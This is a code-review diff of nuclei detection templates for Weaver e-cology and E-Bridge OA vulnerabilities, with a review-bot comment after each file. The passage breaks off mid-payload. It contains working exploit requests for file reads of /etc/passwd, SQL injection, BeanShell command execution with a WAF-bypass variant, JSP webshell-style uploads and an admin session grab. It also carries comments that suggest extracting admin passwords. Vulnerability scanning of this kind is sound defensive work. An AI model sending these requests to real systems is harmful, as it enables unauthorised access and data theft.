fileid=2+WAITFOR DELAY+'0:0:7'&isFromOutImg=1
matchers:
- type: dsl
dsl:
- 'duration>=7'
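Review bot: `duration>=7` on a single request is a time-based blind check with no baseline, so a slow target plus normal processing can trip it; send a control request without the delay and require the delta, or at least document the threshold choice. `WAITFOR DELAY` is SQL Server syntax, which the description should state. `author: unknown` and no `reference`.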

View File

@ -0,0 +1,45 @@
id: weaver-e-bridge-linux-saveyzjfile-file-read
info:
name: weaver-e-bridge-linux-saveyzjfile-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: eBridge,weaver,oa,read
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'id')
- "status_code_2 == 200 && contains(body_2, 'root:x:0')"
condition: and
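Review bot: the first DSL condition `status_code_1 == 200 && contains(body_1,'id')` is too weak to gate the second request: the substring `id` occurs in almost any HTML or JSON response, so the template always proceeds and relies entirely on the `root:x:0` check. Match on the JSON key the extractor already depends on (`"id":"`) instead. The two DSL lines also mix an unquoted and a double-quoted YAML string; quote both the same way.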

View File

@ -0,0 +1,45 @@
id: weaver-e-bridge-windows-saveyzjfile-file-read
info:
name: weaver-e-bridge-windows-saveyzjfile-file-read
author: SleepingBag945
severity: high
description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞攻击者通过漏洞可以读取服务器任意文件
reference:
- https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
tags: eBridge,weaver,oa,read
http:
- raw:
- |
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
- |
GET /file/fileNoLogin/{{idname}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: idname
internal: true
group: 1
regex:
- '"id":"(.*?)"'
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,'id')
- "status_code_2 == 200 && contains(body_2, 'Program Files')"
condition: and
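Review bot: this file duplicates the Linux template above except for `downloadUrl=file:///C:/` and the `'Program Files'` check, so the two will drift apart on the next fix. Fold them into one template with one request per target OS (or a `payloads` list of `downloadUrl` values) so the extractor and matchers are maintained once. The same remarks apply as on the Linux variant: `contains(body_1,'id')` is not a meaningful gate, and the DSL quoting is inconsistent.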

View File

@ -0,0 +1,40 @@
id: weaver-e-cology-bshservlet-rce
info:
name: Weaver E-Cology BeanShell Remote Command Execution
author: SleepingBag945
severity: critical
description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program.
tags: beanshell,rce,weaver
http:
- raw:
- |
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=print%28%22{{randstr}}%22%29%3B
- raw:
- | # bypass waf
POST /weaver/bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
%62%73%68%2e%73%63%72%69%70%74=%70%72%69%6e%74%28%22{{randstr}}%22%29%3b
matchers-condition: and
matchers:
- type: word
words:
- "BeanShell Test Servlet"
- type: word
words:
- "{{randstr}}"
- type: status
status:
- 200
# Enhanced by cs on 2022/07/05
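Review bot: `matchers-condition` and `matchers` appear once, after the second `- raw:` block; in nuclei each `raw` block is a separate request with its own matchers, so as laid out here the first `POST /weaver/bsh.servlet.BshServlet` request has no matchers and can never match, and only the URL-encoded variant marked `# bypass waf` is evaluated. Either put both requests in one `raw:` list (with `stop-at-first-match: true`) or repeat the matchers under the first block. The comment appended to the block-scalar indicator (`- | # bypass waf`) is legal YAML but easy to misread; move it onto its own line above the item.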

View File

@ -0,0 +1,33 @@
id: weaver-e-cology-getdata-sqli
info:
name: weaver-e-cology-getdata-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "1759627252"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录
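Review bot: the trailing comment `# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录` ("decrypt it and you can log in") is exploitation guidance rather than documentation of the check and should not ship in a detection template; remove it. The detection itself is sound: `str(40198*43774)` evaluates to `1759627252`, which is exactly what the body matcher looks for, so a hit proves the injected expression was executed rather than merely that the endpoint exists.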

View File

@ -0,0 +1,35 @@
id: weaver-e-cology-getsqldata-sqli
info:
name: weaver-e-cology-getsqldata-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"api_status":'
- '"status":true}'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
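Review bot: the body matcher only requires `{"api_status":` and `"status":true}`, which `getSqlData` returns for any well-formed request, so this template reports a finding without proving that the `sql` parameter was executed. Use the approach of the sibling `getdata.jsp` template: select an arithmetic product and match on the computed number. The query string `?sql=sql=select%20@@version` also looks doubled (`sql=sql=`); confirm which form the endpoint actually expects.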

View File

@ -0,0 +1,30 @@
id: weaver-e-cology-hrmcarreerapplyperview-sqli
info:
name: weaver-e-cology-hrmcarreerapplyperview-sqli
author: SleepingBag945
severity: high
description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞攻击者通过漏洞可以获取服务器数据库敏感文件
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml;charset=UTF-8
matchers-condition: and
matchers:
- type: word
part: body
words:
- "900150983cd24fb0d6963f7d28e17f72"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
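Review bot: `id` and `name` spell the page as `hrmcarreerapplyperview` (double r) while the request path is `HrmCareerApplyPerView.jsp`; template ids are the stable handle other tooling references and are painful to rename later, so fix the spelling before merge. `Content-Type: text/xml;charset=UTF-8` on a body-less GET is unnecessary and can be dropped. The expected value is right: MD5 of `abc` is `900150983cd24fb0d6963f7d28e17f72`.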

View File

@ -0,0 +1,33 @@
id: weaver-e-cology-jqueryfiletree-directory-traversal
info:
name: weaver e-cology-jqueryfiletree-directory-traversal
author: SleepingBag945
severity: medium
description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
tags: weaver,e-cology,oa
http:
- raw:
- |
GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "'index.jsp','"
- type: word
words:
- "重命名"
- type: word
words:
- "新建目录"
- type: status
status:
- 200
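Review bot: with `matchers-condition: and`, the word matchers for the Chinese UI strings `重命名` ("rename") and `新建目录` ("new folder") make the result locale-dependent: an English-language E-Cology install that is just as traversable will not be reported. Keep the locale-independent `'index.jsp','` check and the status check, and either drop the localized strings or group them under one matcher with `condition: or`. The `words` matchers also lack `part: body`; add it for consistency with the rest of the set.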

View File

@ -0,0 +1,53 @@
id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload
info:
name: weaver e-cology KtreeUploadAction arbitrary file upload
author: SleepingBag945
severity: critical
description: 泛微E-Cology存在文件上传漏洞攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用
reference:
- https://buaq.net/go-117479.html
tags: ecology,upload,fileupload,intrusive
http:
- raw:
- |
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib
Accept-Encoding: gzip
------WebKitFormBoundarywgljfvib
Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp"
Content-Type: image/jpeg
<%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarywgljfvib--
- |
GET {(unknown)} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: filename
internal: true
group: 1
regex:
- "','url':'(.*?)','title"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'original')"
- "contains(body_2, '1841626426') && status_code_2 == 200"
condition: and
# Enhanced by md on 2022/10/31
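Review bot: the second request line `GET {(unknown)} HTTP/1.1` does not reference the `filename` extractor defined below it, so the follow-up fetch never reaches the uploaded file and the `body_2` condition cannot succeed; the path must use the extracted URL. The JSP stub does delete itself (`new java.io.File(application.getRealPath(request.getServletPath())).delete();`), so no artifact is left behind; state that in `description`, since the template is tagged `intrusive`. The expected product is correct (`43997 * 41858` is `1841626426`).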

View File

@ -0,0 +1,38 @@
id: weaver-e-cology-loginsso-sqli
info:
name: weaver-e-cology-loginsso-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.html
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(212943773)%20as%20id%20from%20HrmResourceManager HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
part: body
words:
- "db66c43e263be5e8c249b006b1c80792"
- type: word
negative: true
part: header
- "https://www.drupal.org"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# CNVD-2021-33202
# 蜜罐诱捕器。。
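Review bot: the second matcher is malformed: `- type: word` / `negative: true` / `part: header` is followed directly by `- "https://www.drupal.org"` with no `words:` key, so the template fails validation and never loads. Add `words:` above that list item. The trailing `# 蜜罐诱捕器` ("honeypot trap") comment explains that the negative matcher exists to exclude honeypots that answer every request; that belongs in `description`, not in a comment, and `# CNVD-2021-33202` belongs in `reference`.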

View File

@ -0,0 +1,32 @@
id: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read
info:
name: weaver-e-cology-sptmforportalthumbnail-arbitrary-file-read
author: SleepingBag945
severity: medium
description: SptmForPortalThumbnail.jsp可控的preview参数未进行过滤操作直接拼接上web根目录进行文件下载
reference:
- http://124.223.89.192/archives/e-cology8-14
tags: weaver,e-cology,oa
http:
- raw:
- |
GET /portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
words:
- "weaver.general.BaseBean"
- type: word
words:
- "request.getParameter"
- type: status
status:
- 200
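Review bot: `reference` points at a bare IP (`http://124.223.89.192/archives/e-cology8-14`), which will not resolve to anything stable for future maintainers; replace it with a durable link or an archived copy. The check itself is reasonable: requesting `portal/SptmForPortalThumbnail.jsp` through its own `preview` parameter and matching on `weaver.general.BaseBean` and `request.getParameter` only succeeds if JSP source was returned verbatim.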

View File

@ -0,0 +1,81 @@
id: weaver-e-cology-uploadoperation-arbitrary-file-upload
info:
name: weaver e-cology uploadoperation.jsp arbitrary file upload
author: SleepingBag945
severity: critical
description: Ecology contains an arbitrary file upload vulnerability. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code, As a result, an attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cwe-id: CWE-434
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,upload,fileupload,intrusive
http:
- raw:
- |
POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
Accept-Encoding: gzip
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="secId"
1
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="Filedata"; filename="{{randstr_1}}.jsp"
<%out.println("{{randstr_2}}");%>
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="plandetailid"
1
------WebKitFormBoundaryVdb2RRl25PuaGhWj--
- |
POST /OfficeServer HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVdb2RRl25PuaGhWj
Accept-Encoding: gzip
------WebKitFormBoundaryVdb2RRl25PuaGhWj
Content-Disposition: form-data; name="aaa"
{"OPTION":"INSERTIMAGE","isInsertImageNew":"1","imagefileid4pic":"{{fileid}}"}
------WebKitFormBoundaryVdb2RRl25PuaGhWj--
- |
GET /{{randstr_1}}.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
extractors:
- type: regex
name: fileid
internal: true
group: 1
regex:
- "&fileid=(.*?)\'>"
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
- "contains(body_2, 'println') && status_code_2 == 200"
- "status_code_3 == 200 && contains(body_3,'{{randstr_2}}')"
condition: and
# Enhanced by md on 2022/10/31
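Review bot: unlike the `KtreeUploadAction` template in this same commit, the uploaded `{{randstr_1}}.jsp` here (`<%out.println("{{randstr_2}}");%>`) does not remove itself, so every scan leaves a live JSP at the target's web root. Have the stub delete its own file after printing, as the sibling template does, and name the residual artifact in `description` since the template is tagged `intrusive`. The `body_2` condition `contains(body_2, 'println')` is also fragile because it depends on `OfficeServer` echoing the file content; the third condition already proves execution, so step two can be relaxed to the status code.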

View File

@ -0,0 +1,34 @@
id: weaver-e-cology-validate-sqli
info:
name: weaver-e-cology-validate-sqli
author: SleepingBag945
severity: high
description: 泛微e-cology OA系统的validate.jsp文件中因为对参数capitalid过滤不严可致使SQL注入漏洞。攻击者运用该漏洞可在未授权的情况下远程发送精心构造的SQL语句从而取得数据库敏感信息。
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
POST /cpt/manage/validate.jsp?sourcestring=validateNum HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%
0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str(9039*926)&capitalnum=-10
matchers-condition: and
matchers:
- type: word
part: body
words:
- "8370114"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录
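Review bot: the trailing comment `# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录` is copied verbatim from the `getdata.jsp` template and does not even apply to this endpoint (the `capitalid` injection here returns `str(9039*926)` through a `union`); it is exploitation guidance rather than documentation and should be removed. The expected value `8370114` is correct for `9039*926`.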

View File

@ -0,0 +1,41 @@
id: weaver-e-cology-verifyquicklogin-arbitrary-login
info:
name: weaver e-cology verifyquicklogin.jsp arbitrarylogin
author: SleepingBag945
severity: high
description: 泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞攻击者通过发送特殊的请求包可以获取管理员Session
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,weaver,oa
http:
- raw:
- |
POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
identifier=1&language=1&ipaddress=x.x.x.x
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"sessionkey\":"
- type: word
part: body
words:
- "\"message\":"
- type: status
status:
- 200
# Enhanced by md on 2022/10/31
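Review bot: the body matcher `\"sessionkey\":` only checks that the key is present, and a failed lookup can return `"sessionkey":""`, which would still match; use a `regex` matcher that requires a non-empty value (for example `\"sessionkey\":\"[^\"]+\"`). `ipaddress=x.x.x.x` is a literal placeholder sent to the target; document why that is acceptable or the next reader will assume it is unfinished. This check also obtains a working session for an administrator account, so tag it `intrusive` and note in `description` that the returned key is not stored anywhere.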

View File

@ -0,0 +1,39 @@
id: weaver-e-cology-workflowcentertreedata-sqli
info:
name: weaver e-cology WorkflowCenterTreeData.jsp sqli
author: SleepingBag945
severity: high
description: 2019年10月10日CNVD发布了泛微e-cology OA系统存在SQL注入漏洞。该漏洞是由于OA系统的WorkflowCenterTreeData接口中涉及Oracle数据库的SQL语句缺乏安全检查措施所导致的任意攻击者都可借SQL语句拼接时机注入恶意payload造成SQL注入攻击。
reference:
- http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20WorkflowCenterTreeData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
- https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/%E6%B3%9B%E5%BE%AEoa/%E6%B3%9B%E5%BE%AEOA%20WorkflowCenterTreeData%E6%8E%A5%E5%8F%A3%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%28%E9%99%90oracle%E6%95%B0%E6%8D%AE%E5%BA%93%29/
tags: ecology,weaver,oa,sqli
http:
- raw:
- |
POST /mobile/browser/WorkflowCenterTreeData.jsp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
node=wftype_1132232323231&scope=23332323&formids=1111111111111%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%